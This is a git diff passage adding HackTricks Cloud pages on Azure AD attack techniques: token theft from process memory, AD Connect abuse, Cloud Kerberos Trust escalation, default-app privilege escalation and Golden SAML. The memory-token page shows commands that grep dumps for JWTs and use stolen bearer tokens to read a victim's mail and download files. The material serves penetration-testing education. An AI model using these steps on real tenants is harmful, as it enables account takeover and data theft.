+{% endhint %}
+
+**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
new file mode 100644
index 0000000000..3512fd8763
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
@@ -0,0 +1,65 @@
+# Az - Processes Memory Access Token
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## **Basic Information**
+
+As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
+
+Steps:
+
+1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
+2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
+3. Find the tokens that interest you the most and run tools over them:
+
+{% code overflow="wrap" %}
+```bash
+# Check the identity of the token
+curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq   
+ 
+# Check the email (you need a token authorized in login.microsoftonline.com)
+curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq   
+
+# Download a file from Teams
+## You need a token that can access graph.microsoft.com
+## Then, find the <site_id> inside the memory and call
+curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq     
+ 
+## Then, list one drive
+curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq 
+ 
+## Finally, download a file from that drive:
+┌──(magichk㉿black-pearl)-[~] 
+└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
+```
+{% endcode %}
+
+**Note that these kind of access tokens can be also found inside other processes.**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
new file mode 100644
index 0000000000..109104b7e2
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
@@ -0,0 +1,86 @@
+# Az AD Connect - Hybrid Identity
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments:
+
+* **Pass-Through Authentication (PTA)**:
+  * Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud).
+  * Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem).
+
+{% content-ref url="pta-pass-through-authentication.md" %}
+[pta-pass-through-authentication.md](pta-pass-through-authentication.md)
+{% endcontent-ref %}
+
+* **Password Hash Sync (PHS)**:
+  * Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user.
+
+{% content-ref url="phs-password-hash-sync.md" %}
+[phs-password-hash-sync.md](phs-password-hash-sync.md)
+{% endcontent-ref %}
+
+* **Federation**:
+  * Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities.
+
+{% content-ref url="federation.md" %}
+[federation.md](federation.md)
+{% endcontent-ref %}
+
+* **Seamless SSO:**
+  * Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user.
+
+{% content-ref url="seamless-sso.md" %}
+[seamless-sso.md](seamless-sso.md)
+{% endcontent-ref %}
+
+* **Cloud Kerberos Trust**:
+  * Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD.
+
+{% content-ref url="az-cloud-kerberos-trust.md" %}
+[az-cloud-kerberos-trust.md](az-cloud-kerberos-trust.md)
+{% endcontent-ref %}
+
+* **Default Applications**:
+  * Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files.
+
+{% content-ref url="az-default-applications.md" %}
+[az-default-applications.md](az-default-applications.md)
+{% endcontent-ref %}
+
+For each integration method, user synchronization is conducted, and an `MSOL_<installationidentifier>` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain.
+
+To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used:
+
+```powershell
+Get-ADSyncConnector
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
new file mode 100644
index 0000000000..6c0e772f8a
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
@@ -0,0 +1,76 @@
+# Az - Cloud Kerberos Trust
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay\_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.**
+
+## Basic Information
+
+### Trust
+
+When a trust is stablished with Azure AD, a **Read Only Domain Controller (RODC) is created in the AD.** The **RODC computer account**, named **`AzureADKerberos$`**. Also, a secondary `krbtgt` account named **`krbtgt_AzureAD`**. This account contains the **Kerberos keys** used for tickets that Azure AD creates.
+
+Therefore, if this account is compromised it could be possible to impersonate any user... although this is not true because this account is prevented from creating tickets for any common privileged AD group like Domain Admins, Enterprise Admins, Administrators...
+
+{% hint style="danger" %}
+However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.**
+{% endhint %}
+
+### Kerberos TGT
+
+Moreover, when a user authenticates on Windows using a hybrid identity **Azure AD** will issue **partial Kerberos ticket along with the PRT.** The TGT is partial because **AzureAD has limited information** of the user in the on-prem AD (like the security identifier (SID) and the name).\
+Windows can then **exchange this partial TGT for a full TGT** by requesting a service ticket for the `krbtgt` service.
+
+### NTLM
+
+As there could be services that doesn't support kerberos authentication but NTLM, it's possible to request a **partial TGT signed using a secondary `krbtgt`** key including the **`KERB-KEY-LIST-REQ`** field in the **PADATA** part of the request and then get a full TGT signed with the primary `krbtgt` key **including the NT hash in the response**.
+
+## Abusing Cloud Kerberos Trust to obtain Domain Admin <a href="#abusing-cloud-kerberos-trust-to-obtain-domain-admin" id="abusing-cloud-kerberos-trust-to-obtain-domain-admin"></a>
+
+When AzureAD generates a **partial TGT** it will be using the details it has about the user. Therefore, if a Global Admin could modify data like the **security identifier and name of the user in AzureAD**, when requesting a TGT for that user the **security identifier would be a different one**.
+
+It's not possible to do that through the Microsoft Graph or the Azure AD Graph, but it's possible to use the **API Active Directory Connect** uses to create and update synced users, which can be used by the Global Admins to **modify the SAM name and SID of any hybrid user**, and then if we authenticate, we get a partial TGT containing the modified SID.
+
+Note that we can do this with AADInternals and update to synced users via the [Set-AADIntAzureADObject](https://aadinternals.com/aadinternals/#set-aadintazureadobject-a) cmdlet.
+
+### Attack prerequisites <a href="#attack-prerequisites" id="attack-prerequisites"></a>
+
+The success of the attack and attainment of Domain Admin privileges hinge on meeting certain prerequisites:
+
+* The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts.
+* Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication.
+* Identification of a **target victim account** within Active Directory is a necessity. Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket.
+  * Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC.
+  * The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object.
+
+### The full attack <a href="#the-full-attack" id="the-full-attack"></a>
+
+Check it in the original post: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md
new file mode 100644
index 0000000000..357b0f863b
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md
@@ -0,0 +1,35 @@
+# Az - Default Applications
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8)
+
+The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md
new file mode 100644
index 0000000000..d2c2f42875
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md
@@ -0,0 +1,61 @@
+# Az- Synchronising New Users
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD
+
+I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements:
+
+* The **AzureAD user** needs to have a proxy address (a **mailbox**)
+* License is not required
+* Should **not be already synced**
+
+{% code overflow="wrap" %}
+```powershell
+Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl
+```
+{% endcode %}
+
+When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email.
+
+An automatically, this user will be **synced from AzureAD to the on-prem AD user**.
+
+{% hint style="danger" %}
+Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**.
+
+Also, this **won't bypass MFA**.
+
+Moreover, this was reported an **account sync is no longer possible for admin accounts**.
+{% endhint %}
+
+## References
+
+* [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
new file mode 100644
index 0000000000..caf83bbd1f
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
@@ -0,0 +1,187 @@
+# Az - Federation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-fed)**Federation** is a collection of **domains** that have established **trust**. The level of trust may vary, but typically includes **authentication** and almost always includes **authorization**. A typical federation might include a **number of organizations** that have established **trust** for **shared access** to a set of resources.
+
+You can **federate your on-premises** environment **with Azure AD** and use this federation for authentication and authorization. This sign-in method ensures that all user **authentication occurs on-premises**. This method allows administrators to implement more rigorous levels of access control. Federation with **AD FS** and PingFederate is available.
+
+<figure><img src="../../../../.gitbook/assets/image (154).png" alt=""><figcaption></figcaption></figure>
+
+Bsiacally, in Federation, all **authentication** occurs in the **on-prem** environment and the user experiences SSO across all the trusted environments. Therefore, users can **access** **cloud** applications by using their **on-prem credentials**.
+
+**Security Assertion Markup Language (SAML)** is used for **exchanging** all the authentication and authorization **information** between the providers.
+
+In any federation setup there are three parties:
+
+* User or Client
+* Identity Provider (IdP)
+* Service Provider (SP)
+
+(Images from https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
+
+<figure><img src="../../../../.gitbook/assets/image (121).png" alt=""><figcaption></figcaption></figure>
+
+1. Initially, an application (Service Provider or SP, such as AWS console or vSphere web client) is accessed by a user. This step might be bypassed, leading the client directly to the IdP (Identity Provider) depending on the specific implementation.
+2. Subsequently, the SP identifies the appropriate IdP (e.g., AD FS, Okta) for user authentication. It then crafts a SAML (Security Assertion Markup Language) AuthnRequest and reroutes the client to the chosen IdP.
+3. The IdP takes over, authenticating the user. Post-authentication, a SAMLResponse is formulated by the IdP and forwarded to the SP through the user.
+4. Finally, the SP evaluates the SAMLResponse. If validated successfully, implying a trust relationship with the IdP, the user is granted access. This marks the completion of the login process, allowing the user to utilize the service.
+
+**If you want to learn more about SAML authentication and common attacks go to:**
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %}
+
+## Pivoting
+
+* AD FS is a claims-based identity model.
+* "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet."
+* Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP.
+* A user is identified by ImmutableID. It is globally unique and stored in Azure AD.
+* TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user.
+* More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims)
+
+**Golden SAML attack:**
+
+* In ADFS, SAML Response is signed by a token-signing certificate.
+* If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD!
+* Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response.
+* The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine.
+* More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
+
+### Golden SAML
+
+The process where an **Identity Provider (IdP)** produces a **SAMLResponse** to authorize user sign-in is paramount. Depending on the IdP's specific implementation, the **response** might be **signed** or **encrypted** using the **IdP's private key**. This procedure enables the **Service Provider (SP)** to confirm the authenticity of the SAMLResponse, ensuring it was indeed issued by a trusted IdP.
+
